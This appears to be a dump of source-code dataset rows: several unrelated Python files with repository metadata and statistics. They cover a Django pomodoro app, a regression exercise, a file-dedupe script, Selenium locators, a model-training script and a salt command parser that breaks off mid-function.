] | null | null | null | gesund_projekt/pomodoros/views.py | asis2016/gesund-projekt | cb3828b69cd6a86deeab16943e38b6ebffd86abb | [
"MIT"
] | null | null | null | #
#
# This django app is not completed.
from django.contrib.auth.mixins import LoginRequiredMixin
from django.urls import reverse_lazy
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.views.generic import ListView
from .models import Pomodoro
class PomodoroListView(LoginRequiredMixin, ListView):
    """Paginated list of the logged-in user's pomodoros."""
    context_object_name = 'pomodoro_list'
    model = Pomodoro
    paginate_by = 10
    template_name = 'pomodoros/index.html'

    def get_queryset(self):
        # Only this user's records, newest first.
        own_records = Pomodoro.objects.all().filter(author=self.request.user)
        return own_records.order_by('-datestamp')

    def get_context_data(self, **kwargs):
        context = super(PomodoroListView, self).get_context_data(**kwargs)
        # The chart uses the same records but in chronological order.
        chart_records = Pomodoro.objects.all().filter(author=self.request.user)
        context['pomodoro_list_chart'] = chart_records.order_by('datestamp')
        return context
class PomodoroCreateView(CreateView):
    """Create a new pomodoro entry."""
    model = Pomodoro
    fields = ('datestamp', 'pomodoro_minutes', 'break_minutes', 'remarks')
    template_name = 'pomodoros/add.html'

    def form_valid(self, form):
        # Stamp the new pomodoro with the logged-in user before saving.
        form.instance.author = self.request.user
        return super(PomodoroCreateView, self).form_valid(form)
class PomodoroUpdateView(UpdateView):
    """Update an existing pomodoro entry."""
    model = Pomodoro
    context_object_name = 'pomodoro_obj'
    fields = ('datestamp', 'pomodoro_minutes', 'break_minutes', 'remarks')
    template_name = 'pomodoros/update.html'

    def form_valid(self, form):
        # Re-assert ownership on save.
        form.instance.author = self.request.user
        return super(PomodoroUpdateView, self).form_valid(form)
class PomodoroDeleteView(DeleteView):
    """Delete a pomodoro entry, then return to the index page."""
    model = Pomodoro
    context_object_name = 'pomodoro_obj'
    success_url = reverse_lazy('pomodoros-index')
    template_name = 'pomodoros/delete.html'
| 31.224138 | 106 | 0.710105 | 205 | 1,811 | 6.107317 | 0.35122 | 0.031949 | 0.067093 | 0.067093 | 0.451278 | 0.42492 | 0.42492 | 0.42492 | 0.42492 | 0.42492 | 0 | 0.00134 | 0.175594 | 1,811 | 57 | 107 | 31.77193 | 0.83724 | 0.059083 | 0 | 0.378378 | 0 | 0 | 0.154762 | 0.025 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0 | 0.135135 | 0.027027 | 0.864865 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
2865869a867cb57df929e1794ae8598dfae8a9b2 | 1,618 | py | Python | test/linear/ex1.py | taowu750/wtml | 906cb1c1832a8a1a389186d526ad12102c23a2e2 | [
"Apache-2.0"
] | null | null | null | test/linear/ex1.py | taowu750/wtml | 906cb1c1832a8a1a389186d526ad12102c23a2e2 | [
"Apache-2.0"
] | null | null | null | test/linear/ex1.py | taowu750/wtml | 906cb1c1832a8a1a389186d526ad12102c23a2e2 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Exercise 1: linear regression with one variable (translated from Chinese).

Throughout this exercise you will use the scripts ex1.py and ex1_multi.py.
These scripts set up the datasets for the problems and call the functions to
be written; they do not need to be modified themselves. For this programming
exercise only the first part is required: linear regression with a single
variable. The second part (multivariate linear regression) is optional.

Scenario: suppose you are the CEO of a restaurant chain considering opening
a new branch in different cities. The chain already operates food trucks in
various cities, and you have data pairing each city's population with its
profit. You want to use this data to help choose the next city to expand
into.

The file ex1data1.txt contains the dataset for the linear regression
problem: the first column is a city's population, the second column is the
profit of a food truck in that city. Negative values indicate a loss.
"""
import matplotlib.pyplot as plt
import numpy as np
from linear import LinearReg
if __name__ == '__main__':
    'Part2: Plotting'
    print('Plotting Data ...')
    # Load the comma-separated dataset: column 0 = population, column 1 = profit.
    data = np.loadtxt('ex1data1.txt', delimiter=',')
    X = data[:, :1]
    y = data[:, 1:2]
    m = data.shape[0]  # number of training examples
    # Scatter plot of the raw training data.
    plt.xlabel('Population of City in 10,000s')
    plt.ylabel('Profit in $10,000s')
    plt.plot(X, y, 'rx', markersize=6)
    plt.show()
    print('\nRunning Gradient Descent ...')
    # Fit a univariate linear model by gradient descent.
    max_iter = 1500
    li = LinearReg(max_iter=max_iter)
    theta = li.train(X, y)
    print('theta found by gradient descent:')
    print(theta)
    print('Expected theta values (approx):')
    print(' -3.6303\n 1.1664')
    # Plot the linear fit
    i1, = plt.plot(X[:, 0], y, 'rx', markersize=6)
    i2, = plt.plot(X[:, 0], li.predict(X), 'b-')
    plt.legend([i1, i2], ['Training data', 'Linear regression'], loc='upper right')
    plt.show()
    # Predict profits for cities of 35,000 and 70,000 people (the leading 1 is
    # presumably the intercept/bias feature expected by LinearReg — confirm).
    predict1 = li.predict(np.array([1, 3.5]))
    print('For population = 35,000, we predict a profit of %f' % (predict1 * 10000))
    predict2 = li.predict(np.array([1, 7]))
    print('For population = 70,000, we predict a profit of %f' % (predict2 * 10000))
    'Part 4: Visualizing J(theta_0, theta_1)'
    # TODO: draw an intuitive 3-D plot of the cost surface
| 27.896552 | 84 | 0.657602 | 220 | 1,618 | 4.777273 | 0.577273 | 0.019981 | 0.022835 | 0.020932 | 0.074215 | 0.041865 | 0.041865 | 0 | 0 | 0 | 0 | 0.059002 | 0.182942 | 1,618 | 57 | 85 | 28.385965 | 0.736006 | 0.243511 | 0 | 0.064516 | 0 | 0 | 0.327288 | 0 | 0 | 0 | 0 | 0.017544 | 0 | 1 | 0 | false | 0 | 0.096774 | 0 | 0.096774 | 0.258065 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
28748a0e99ca7df8968c84c26b4277b422294c17 | 459 | py | Python | scripts/cleanup.py | felis/kicad-schlib | 986c64aa0adae75446a3717976a6742d1b57f3ee | [
"CC0-1.0"
] | 38 | 2015-05-26T02:17:32.000Z | 2018-06-24T10:47:28.000Z | scripts/cleanup.py | felis/kicad-schlib | 986c64aa0adae75446a3717976a6742d1b57f3ee | [
"CC0-1.0"
] | 19 | 2016-03-26T17:20:20.000Z | 2018-03-31T19:22:21.000Z | scripts/cleanup.py | felis/kicad-schlib | 986c64aa0adae75446a3717976a6742d1b57f3ee | [
"CC0-1.0"
] | 22 | 2015-05-25T20:01:59.000Z | 2018-06-24T13:39:35.000Z | #!/usr/bin/python3
import hashlib
import os
import sys


def file_md5(path):
    """Return the hex MD5 digest of the file at *path*.

    Reads in fixed-size chunks so arbitrarily large files never have to fit
    in memory. Replaces the original shell-out to the external ``md5sum``
    binary with the portable stdlib equivalent (same hex digests).
    """
    digest = hashlib.md5()
    with open(path, 'rb') as fh:
        for chunk in iter(lambda: fh.read(65536), b''):
            digest.update(chunk)
    return digest.hexdigest()


def dedupe(dirname):
    """Replace duplicate files in *dirname* with symlinks to the first copy.

    The first file seen with a given digest is kept; every later file with
    the same digest is removed and replaced by a relative symlink to it.
    """
    md5sums = {}
    for fn in os.listdir(dirname):
        path = os.path.join(dirname, fn)
        md5sum = file_md5(path)
        if md5sum in md5sums:
            # This blob already exists. Symlink it (relative target, so the
            # link stays valid if the whole directory is moved).
            os.unlink(path)
            os.symlink(md5sums[md5sum], path)
        else:
            md5sums[md5sum] = fn


if __name__ == '__main__':
    dedupe(sys.argv[1])
| 22.95 | 109 | 0.651416 | 64 | 459 | 4.65625 | 0.515625 | 0.060403 | 0.100671 | 0.171141 | 0.231544 | 0.167785 | 0 | 0 | 0 | 0 | 0 | 0.032698 | 0.200436 | 459 | 19 | 110 | 24.157895 | 0.779292 | 0.117647 | 0 | 0 | 0 | 0 | 0.029777 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
287bd37592c6d354809a9ac7ecfe94395a48d62b | 743 | py | Python | example/urls.py | bennylope/django-shop | 7e7cd743773405f193abefdb8aa30f28b17d71cd | [
"BSD-3-Clause"
] | 1 | 2015-03-23T20:40:39.000Z | 2015-03-23T20:40:39.000Z | example/urls.py | bennylope/django-shop | 7e7cd743773405f193abefdb8aa30f28b17d71cd | [
"BSD-3-Clause"
] | null | null | null | example/urls.py | bennylope/django-shop | 7e7cd743773405f193abefdb8aa30f28b17d71cd | [
"BSD-3-Clause"
] | null | null | null | from django.conf.urls.defaults import *
from shop.views import ShopTemplateView
from shop import urls as shop_urls
# Legacy Django 1.x-style URLconf (uses the deprecated patterns()/defaults API).
# Enable the admin and auto-register installed apps' ModelAdmins.
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
    # Example:
    # (r'^shop_example/', include('shop_example.foo.urls')),
    # Admin documentation app:
    (r'^admin/doc/', include('django.contrib.admindocs.urls')),
    # Admin site:
    (r'^admin/', include(admin.site.urls)),
    # Home page, rendered by the shop's generic template view.
    url(r'^$', ShopTemplateView.as_view(template_name="shop/welcome.html"),
        name='shop_welcome'),
    # Mount every URL from the shop app at the site root.
    (r'^', include(shop_urls)), # <-- That's the important bit
)
| 28.576923 | 75 | 0.695828 | 100 | 743 | 5.1 | 0.43 | 0.076471 | 0.094118 | 0.078431 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166891 | 743 | 25 | 76 | 29.72 | 0.82391 | 0.345895 | 0 | 0 | 0 | 0 | 0.165272 | 0.060669 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
2881054007cf9eb1d5b97fa959953a1f71dabe7a | 1,212 | py | Python | drf_tools/validation/base.py | seebass/drf-toolbox | a24b1db9c42c6af4b939f9dd0181fc9eaf5076f1 | [
"MIT"
] | 5 | 2015-10-14T13:11:06.000Z | 2019-11-08T12:18:36.000Z | drf_tools/validation/base.py | seebass/drf-toolbox | a24b1db9c42c6af4b939f9dd0181fc9eaf5076f1 | [
"MIT"
] | null | null | null | drf_tools/validation/base.py | seebass/drf-toolbox | a24b1db9c42c6af4b939f9dd0181fc9eaf5076f1 | [
"MIT"
] | 1 | 2020-07-04T07:11:33.000Z | 2020-07-04T07:11:33.000Z | from abc import ABCMeta, abstractmethod
from django_tooling.exceptions import ValidationError
class FailedValidation:
    """Value object describing a single failed validation.

    Carries the machine-readable ``code``, the ``details`` mapping used for
    message interpolation, and the (possibly formatted) human-readable
    ``msg``.
    """

    def __init__(self, code, details, msg):
        self.code = code
        self.details = details
        # Interpolate the details into the message template only when both
        # are provided; otherwise keep the message as given.
        self.msg = msg.format(**details) if msg and details else msg
class Validation(metaclass=ABCMeta):
    """
    Base class for all validations.

    The registered key is the app name plus the snake_case version of the class name.
    NameTooLong in secretobject will be available as secretobject_name_too_long
    """

    def __init__(self, fieldName=None):
        self.__fieldName = fieldName
        self.__failedValidations = []

    @abstractmethod
    def _validate(self):
        """Subclasses run their checks here, reporting via ``_addFailure``."""

    def validate(self, raiseError=True):
        """Run the validation; optionally raise on any recorded failure."""
        self._validate()
        if raiseError and self.__failedValidations:
            messages = [failure.msg for failure in self.__failedValidations]
            raise ValidationError(messages, self.__fieldName)

    def _addFailure(self, code, details=None, msg=None):
        """Record one failed validation for later reporting."""
        self.__failedValidations.append(FailedValidation(code, details, msg))

    def getFailedValidations(self):
        """Return the list of failures collected so far."""
        return self.__failedValidations
| 30.3 | 124 | 0.69967 | 133 | 1,212 | 6.150376 | 0.443609 | 0.128362 | 0.026895 | 0.041565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.226073 | 1,212 | 39 | 125 | 31.076923 | 0.872068 | 0.155941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.041667 | 0.083333 | 0.041667 | 0.458333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
288139eeaade5a3d49aa1c45ca64936eb8a55d9b | 455 | py | Python | osr/apps/registry/migrations/0006_auto_20191029_2325.py | offurface/osr | 83ebcc11f0d9d8050ac2139bc6e9e560e93e8b9e | [
"MIT"
] | null | null | null | osr/apps/registry/migrations/0006_auto_20191029_2325.py | offurface/osr | 83ebcc11f0d9d8050ac2139bc6e9e560e93e8b9e | [
"MIT"
] | 10 | 2021-03-19T09:01:32.000Z | 2022-02-10T21:34:43.000Z | osr/apps/registry/migrations/0006_auto_20191029_2325.py | offurface/osr | 83ebcc11f0d9d8050ac2139bc6e9e560e93e8b9e | [
"MIT"
] | null | null | null | # Generated by Django 2.2.6 on 2019-10-29 20:25
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: allow `Primary.recommendations` to be left blank on its
    many-to-many link to `registry.Sport_type`."""

    dependencies = [
        ('registry', '0005_auto_20191029_2312'),
    ]
    operations = [
        migrations.AlterField(
            model_name='primary',
            name='recommendations',
            # verbose_name is Russian for "Recommendations".
            field=models.ManyToManyField(blank=True, to='registry.Sport_type', verbose_name='Рекомендации'),
        ),
    ]
| 23.947368 | 108 | 0.635165 | 48 | 455 | 5.895833 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090643 | 0.248352 | 455 | 18 | 109 | 25.277778 | 0.736842 | 0.098901 | 0 | 0 | 1 | 0 | 0.205882 | 0.056373 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
288158558cb5b27285bd59e2a01c288a73ce1d28 | 661 | py | Python | src/values/locators.py | Jorge644/python-fravega-test | bbfa170fd38bb1ea8c18baccf456ec0f7ca17bc4 | [
"bzip2-1.0.6"
] | null | null | null | src/values/locators.py | Jorge644/python-fravega-test | bbfa170fd38bb1ea8c18baccf456ec0f7ca17bc4 | [
"bzip2-1.0.6"
] | null | null | null | src/values/locators.py | Jorge644/python-fravega-test | bbfa170fd38bb1ea8c18baccf456ec0f7ca17bc4 | [
"bzip2-1.0.6"
] | null | null | null | from selenium.webdriver.common.by import By
# Locator tuples (strategy, expression) for the product-search UI, meant to
# be splatted into driver.find_element(*locator).
search_locator = (By.XPATH, "//input[@placeholder='Buscar productos']")
search_button_locator = (By.CSS_SELECTOR, "button[class*='InputBar']")
all_brands_locator = (By.XPATH, "//li[@name='brandsFilter'] //a[text()='Ver todas']")
# Template locator: fill in the brand label with str.format().
find_specify_brand_locator = (By.XPATH, "//div[@class='ant-modal-body'] //label[text()='{}']")
pagination_locator = (By.XPATH, "//ul[@class='ant-pagination']/li")
items_founded_locator = (By.XPATH, "//ul[@name='itemsGrid']/li")
submit_specific_brand_locator = (By.XPATH, "//div[@class='ant-modal-body'] //button[@id='apply']")
# BUG FIX: "//h4" is an XPath expression, not a CSS selector; pairing it with
# By.CSS_SELECTOR made this locator unusable. Use the XPath strategy instead.
title_search_element_locator = (By.XPATH, "//h4")
| 60.090909 | 98 | 0.704992 | 89 | 661 | 5.022472 | 0.52809 | 0.161074 | 0.187919 | 0.089485 | 0.174497 | 0.174497 | 0.174497 | 0.174497 | 0.174497 | 0 | 0 | 0.001623 | 0.068079 | 661 | 10 | 99 | 66.1 | 0.724026 | 0 | 0 | 0 | 0 | 0 | 0.423601 | 0.329803 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2894f5a5d9df5fd28b16ee4d28f62ac750794ff8 | 437 | py | Python | src/main.py | Morteza-Haghshenas/SEAL-CI | 8bb65d00befb58e63044d7727149a0245f52bf9c | [
"MIT"
] | 1 | 2019-12-23T10:03:08.000Z | 2019-12-23T10:03:08.000Z | src/main.py | Morteza-Haghshenas/SEAL-CI | 8bb65d00befb58e63044d7727149a0245f52bf9c | [
"MIT"
] | null | null | null | src/main.py | Morteza-Haghshenas/SEAL-CI | 8bb65d00befb58e63044d7727149a0245f52bf9c | [
"MIT"
] | null | null | null | """Training a SEAL-CI model."""
import torch
from utils import tab_printer
from seal import SEALCITrainer
from param_parser import parameter_parser
def main():
    """Parse command-line parameters, read the data, then fit and score a
    SEAL-CI model."""
    params = parameter_parser()
    tab_printer(params)
    seal_trainer = SEALCITrainer(params)
    seal_trainer.fit()
    seal_trainer.score()


if __name__ == "__main__":
    main()
| 20.809524 | 50 | 0.686499 | 54 | 437 | 5.314815 | 0.592593 | 0.034843 | 0.04878 | 0.083624 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.217391 | 437 | 20 | 51 | 21.85 | 0.839181 | 0.249428 | 0 | 0 | 0 | 0 | 0.026403 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.333333 | 0 | 0.416667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
289823656a6b99b341cc27d6743090e32fea1269 | 1,828 | py | Python | cogs/helpers/gamedeals.py | santoshpanna/Discord-Bot | 4757a5899dede946a8e409604d230ddc77626d41 | [
"MIT"
] | null | null | null | cogs/helpers/gamedeals.py | santoshpanna/Discord-Bot | 4757a5899dede946a8e409604d230ddc77626d41 | [
"MIT"
] | null | null | null | cogs/helpers/gamedeals.py | santoshpanna/Discord-Bot | 4757a5899dede946a8e409604d230ddc77626d41 | [
"MIT"
] | null | null | null | import re
from common import database, common
# Whitelist of store domains whose links count as deals.
# TODO - shift to database
stores = ['steampowered.com', 'humblebundle.com', 'epicgames.com', 'reddit.com']
# Steam URL fragments that identify an actual store page (app/bundle/sub);
# isNotSteamLink() rejects steampowered.com URLs that match none of these.
steamlinks = ('steampowered.com/app', 'steampowered.com/bundle', 'steampowered.com/sub')
def removeURI(url):
    """Strip the query string (everything from '?') and any trailing slash."""
    query_start = url.find('?')
    if query_start > 0:
        url = url[:query_start]
    return url[:-1] if url.endswith('/') else url
def isNotSteamLink(url):
    """Return True unless *url* points at a Steam store page (app/bundle/sub).

    If the string embeds several URLs (more than one "http"), only the last
    embedded URL is inspected.
    """
    if url.count("http") > 1:
        url = url[url.rfind("http"):]
    return not any(fragment in url for fragment in steamlinks)
# checks if post is from acceptable store
def isFromAcceptableStore(submission):
    """Return True if *submission* links to one of the whitelisted stores.

    *submission* is either a plain URL string or an object exposing a
    ``.url`` attribute. steampowered.com links additionally have to point at
    an actual store page (see ``isNotSteamLink``); other Steam pages are
    rejected.
    """
    # The original duplicated the whole check for the str and object cases;
    # normalize to a URL string once instead.
    url = submission if isinstance(submission, str) else submission.url
    for store in stores:
        if store in url:
            if 'steampowered.com' in url and isNotSteamLink(url):
                return False
            return True
    return False
# get store link from selftext
def getStoreLink(submission):
    """Extract the first acceptable store URL from a submission's selftext.

    Returns the cleaned URL (query string stripped) or None when the text
    contains no link from a whitelisted store.
    """
    url_pattern = r'https?:\/\/[^\s\<\>\"\)\%\]]+|www\.[^\s\<\>\"\%\)\]]+'
    for candidate in re.findall(url_pattern, submission.selftext):
        if isFromAcceptableStore(candidate):
            return removeURI(candidate)
    return None
async def cleaner(bot):
    """Purge stale game deals from the database, reporting progress to the
    master log channel."""
    db = database.Database()
    masterlog = common.getMasterLog()
    # getMasterLog() presumably returns a channel id — resolve it to a
    # channel object via the bot. TODO confirm.
    masterlog = bot.get_channel(masterlog)
    await masterlog.send(f"**Routine**: Purge gamedeals started.")
    # Only success is announced; a non-SUCCESS status is silently ignored.
    if db.cleanGameDeal() == common.STATUS.SUCCESS:
        await masterlog.send(f"**DB Purge**: Purged gamedeals successfully.")
| 26.114286 | 101 | 0.615427 | 206 | 1,828 | 5.456311 | 0.398058 | 0.080071 | 0.016014 | 0.033808 | 0.051601 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002224 | 0.262035 | 1,828 | 69 | 102 | 26.492754 | 0.830986 | 0.068928 | 0 | 0.111111 | 0 | 0 | 0.173451 | 0.044838 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0.088889 | false | 0 | 0.044444 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
289d577d88e7020b4e41872d4ab5a93d68339724 | 4,020 | py | Python | src/new/main.py | AIM-Harvard/DeepConstrast | 0f99f965cd58c63878fac4631572af8f0f3b0269 | [
"MIT"
] | 3 | 2022-02-23T09:05:45.000Z | 2022-02-23T20:18:18.000Z | src/new/main.py | AIM-Harvard/DeepConstrast | 0f99f965cd58c63878fac4631572af8f0f3b0269 | [
"MIT"
] | null | null | null | src/new/main.py | AIM-Harvard/DeepConstrast | 0f99f965cd58c63878fac4631572af8f0f3b0269 | [
"MIT"
] | null | null | null | import os
import os
import glob
import timeit
import argparse
from time import gmtime, strftime
from datetime import datetime

import yaml
import numpy as np
import pandas as pd
import matplotlib
# BUG FIX: the original line was the syntax error
# `import matplotlib.pyplot as pltimport glob` (two statements fused).
import matplotlib.pyplot as plt
from tensorflow.keras.optimizers import Adam

from get_data.get_img_dataset import get_img_dataset
from get_data.get_pat_dataset import get_pat_dataset
from get_data.preprocess_data import preprocess_data
from opts import parse_opts

# NOTE(review): this script also calls dataset(), train_generator(),
# val_generator(), get_model(), train(), evaluate_model() and
# get_stats_plots() without importing them anywhere; the missing imports
# must be restored from the project — confirm their source modules.


if __name__ == '__main__':

    opt = parse_opts()

    # Resolve every configured path relative to the optional root directory.
    if opt.root_dir != '':
        opt.data_dir = os.path.join(opt.root_dir, opt.data_dir)
        opt.pre_data_dir = os.path.join(opt.root_dir, opt.pre_data_dir)
        opt.label_dir = os.path.join(opt.root_dir, opt.label_dir)
        opt.out_dir = os.path.join(opt.root_dir, opt.out_dir)
        opt.pro_data_dir = os.path.join(opt.root_dir, opt.pro_data_dir)
        opt.model_dir = os.path.join(opt.root_dir, opt.model_dir)
        opt.log_dir = os.path.join(opt.root_dir, opt.log_dir)
        opt.train_dir = os.path.join(opt.root_dir, opt.train_dir)
        opt.val_dir = os.path.join(opt.root_dir, opt.val_dir)
        opt.test_dir = os.path.join(opt.root_dir, opt.test_dir)

    # Create missing output directories. BUG FIX: the original called the
    # nonexistent os.path.mkdir() on bare undefined names (`pre_data_dir`,
    # `out_dir`, ...) instead of the resolved opt.* paths.
    for required_dir in (opt.pre_data_dir, opt.out_dir, opt.model_dir,
                         opt.log_dir, opt.train_dir, opt.val_dir, opt.test_dir):
        if not os.path.exists(required_dir):
            os.makedirs(required_dir)

    # Build the image dataset from the raw data.
    dataset(
        data_dir=opt.data_dir,
        pre_data_dir=opt.pre_data_dir,
        pro_data_dir=opt.pro_data_dir,
        label_dir=opt.label_dir,
        data_exclude=opt.data_exclude,
        new_spacing=opt.new_spacing,
        crop_shape=opt.crop_shape,
        interp_type=opt.interp_type,
        run_type=opt.run_type,
        slice_range=opt.slice_range)

    if not opt.no_train:
        # data generators
        train_gen = train_generator(
            pro_data_dir=opt.pro_data_dir,
            batch_size=opt.batch_size)
        x_val, y_val, val_gen = val_generator(
            pro_data_dir=opt.pro_data_dir,
            batch_size=opt.batch_size)
        # get model
        my_model = get_model(
            out_dir=opt.out_dir,
            run_model=opt.run_model,
            activation=opt.activation,
            input_shape=opt.input_shape)
        # train model
        if opt.optimizer_function == 'adam':
            optimizer = Adam(learning_rate=opt.lr)
        else:
            # Fail loudly instead of hitting a NameError further down.
            raise ValueError('unsupported optimizer: {}'.format(opt.optimizer_function))
        train(
            log_dir=opt.log_dir,
            model_dir=opt.model_dir,
            model=my_model,
            run_model=opt.run_model,
            train_gen=train_gen,
            val_gen=val_gen,
            x_val=x_val,
            y_val=y_val,
            batch_size=opt.batch_size,
            epoch=opt.epoch,
            # BUG FIX: the original passed the undefined name `optimizer_function`.
            optimizer=optimizer,
            loss_function=opt.loss_function,
            lr=opt.lr)

    if not opt.no_test:
        for run_type in ['val', 'test']:
            loss, acc = evaluate_model(
                run_type=run_type,
                model_dir=opt.model_dir,
                pro_data_dir=opt.pro_data_dir,
                # NOTE(review): `saved_model` was undefined in the original;
                # assuming it is configured via opts — confirm.
                saved_model=opt.saved_model,
                threshold=0.5,
                activation='sigmoid')
            # get statistics and plots
            get_stats_plots(
                out_dir=opt.out_dir,
                # NOTE(review): `proj_dir` was undefined in the original;
                # using the root directory — confirm intended value.
                proj_dir=opt.root_dir,
                run_type=run_type,
                run_model=opt.run_model,
                loss=None,
                acc=None,
                saved_model=opt.saved_model,
                epoch=opt.epoch,
                batch_size=opt.batch_size,
                lr=opt.lr,
                thr_img=0.5,
                thr_prob=0.5,
                thr_pos=0.5,
                bootstrap=1000)
| 34.358974 | 71 | 0.597761 | 572 | 4,020 | 3.891608 | 0.171329 | 0.078167 | 0.068733 | 0.064241 | 0.318059 | 0.263702 | 0.180144 | 0.169811 | 0.08805 | 0.047619 | 0 | 0.004359 | 0.315174 | 4,020 | 116 | 72 | 34.655172 | 0.804214 | 0.014925 | 0 | 0.104762 | 0 | 0 | 0.006577 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.142857 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
953d9b0ce081e64501bfbda9942c686e4d32a2ea | 3,035 | py | Python | api/utils/input/__init__.py | mmangione/alcali | 6af8c4056c8e9ceed717440551519769ddbbfd3f | [
"MIT"
] | 306 | 2019-05-12T20:16:55.000Z | 2022-03-27T15:00:15.000Z | api/utils/input/__init__.py | mmangione/alcali | 6af8c4056c8e9ceed717440551519769ddbbfd3f | [
"MIT"
] | 340 | 2019-05-27T20:20:44.000Z | 2022-03-17T05:23:57.000Z | api/utils/input/__init__.py | mmangione/alcali | 6af8c4056c8e9ceed717440551519769ddbbfd3f | [
"MIT"
] | 53 | 2019-05-18T00:06:08.000Z | 2022-03-03T17:38:58.000Z | from shlex import split
import json
class RawCommand:
    """Parse a raw salt CLI string into a list of lowstate dictionaries.

    The command is tokenized with :func:`shlex.split`; the leading binary
    name (e.g. ``salt``) is dropped unless ``inline`` is set.
    """

    def __init__(self, command, client="local", posix=True, inline=False):
        # TODO: check shlex.quote, raw string, etc..
        tokens = split(command, posix=posix)
        # Inline commands come without the leading binary name.
        self.command = tokens if inline else tokens[1:]
        self.options = {"expr_form": "glob"}
        self.client = client

    def parse(self):
        """Translate the tokenized command into salt lowstate.

        Returns a one-element list holding the lowstate dict, or an error
        string when the command cannot be parsed.
        """
        args = self.command

        # An explicit --client=<name> token overrides the constructor default.
        if args[0].startswith("--client"):
            self.client = args[0].split("=")[1]
            args.pop(0)

        low = {"client": self.client}
        if self.client.startswith("local"):
            if len(args) < 2:
                return "Command or target not specified"

            # Batch option (only honoured by the local_batch client).
            low["batch"] = None
            if self.client == "local_batch":
                batch_index = None
                for index, arg in enumerate(args):
                    if arg in ["-b", "--batch", "--batch-size"]:
                        low["batch"] = args[index + 1]
                        batch_index = index
                # BUG FIX: `if batch_index:` was falsy when the flag sat at
                # index 0, leaving the flag and its value in the arg list.
                if batch_index is not None:
                    args.pop(batch_index)
                    args.pop(batch_index)

            # Timeout option
            timeout_index = None
            for index, arg in enumerate(args):
                if arg in ["-t", "--timeout"]:
                    low["timeout"] = int(args[index + 1])
